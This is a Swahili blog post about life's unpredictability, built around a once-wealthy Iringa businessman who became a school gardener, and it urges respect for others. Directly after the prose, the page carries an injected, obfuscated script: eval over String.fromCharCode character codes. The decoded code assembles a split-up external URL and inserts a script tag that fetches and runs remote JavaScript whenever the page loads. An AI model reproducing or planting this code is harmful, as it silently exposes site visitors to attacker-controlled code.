Maisha siyo kitu rahisi tu, maisha hayatabiriki kabisa maana maisha hayana kanuni maksi wala urari hivyo basi kila mtu ana jukumu la kutizama maisha yake na kuishi vizuri na kila aliyemzunguka,
Maisha ni kamari tu anayepanda anaweza kushuka muda wowote ngoja nikupe kisa kimoja, moja ya watu waliowahi kuwa na pesa nyingi sana ndani ya mji wa Iringa ni Ramadhani Mrisho Kasawa maarufu kama Uncle Makosa. Kwa wale waliopo Iringa mjini yaani wenyeji unapotoka Iringa mjini kuelekea Dodoma road mpaka kufikia maeneo ya nyumba ya ASAS kuna miti mingi iliopo kando ya barabara je mwajua nani muanzilishi wa project ile? Tuachane na hilo tusonge mbele.
Mzee Makosa alikuwa na duka kubwa sana la dawa pale Iringa mjini ambapo alikuwa akiuza dawa kwa bei ndogo sana akiamini kuwa duka la dawa si biashara ni huduma tu kwa wananchi, pia alikuwa akimiliki ukumbi mkubwa maeneo ya chuo cha RUCU lakini kwa sasa mzee huyo ni Gardener (mtunza maua) wa Shule moja iliopo Iringa iitwayo St. Dominic yaani kaishiwa mali zote mambo yamegeuka kama ni gwaride wamwisho kawa wakwanza.
Tujifunze tu kuwa kesho yetu hatuijui mambo huweza kuwa tofauti kabisa na jana au leo yakageuka kabisa na bahati mbaya zaidi Mungu alifanya kesho na baadaye yetu kuwa fumbo kwa wote.
Unapokuwa unapambana na kutafuta kutunza ni muhimu sana pia kuheshimu walio kando yetu ni muhimu sana haijalishi wapo vizuri kiuchumi zaidi yetu au wapo chini sana, ukiwa na heshima utaishi vyema hata kama kutatokea lolote jema au baya.
Maísha Hayatabiriki jifunze Kuthamini Watu
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments